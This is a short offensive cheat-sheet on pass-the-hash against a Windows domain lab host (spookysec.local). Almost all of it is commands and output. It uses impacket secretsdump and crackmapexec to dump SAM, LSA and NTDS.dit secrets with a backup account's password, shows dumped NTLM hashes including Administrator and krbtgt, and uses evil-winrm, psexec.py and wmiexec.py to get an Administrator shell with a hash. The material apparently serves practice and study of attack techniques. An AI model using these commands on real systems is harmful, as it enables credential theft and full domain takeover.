Pass The Hash

Dump secrets

Check if our user can retrieve secrets (reading SAM and LSA from registries, NTLM hashes, plaintext credentials, kerberos keys and dump of NTDS.dit)

python3 /opt/impacket/examples/secretsdump.py 'spookysec.local/backup:23894712389057@10.10.253.172' -outputfile secretsdump.dump

Or use crackmapexec:

crackmapexec smb 10.10.253.172 -u 'backup' -p '23894712389057' --ntds

Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21:::
[...]

Use those secrets

With those hashes we can obtain a CMD using several tools, for example with Administrator:

evil-winrm -i 10.10.253.172 -u Administrator -H '0e0363213e37b94221497260b0bcb4fc'
psexec.py Administrator@10.10.253.172 -hashes aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc
wmiexec.py Administrator@10.10.253.172 -hashes aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc

References

SecretsDump DemystifiedMedium

SAM & LSA secretsThe Hacker Recipes

impacket secretsdump | WADComs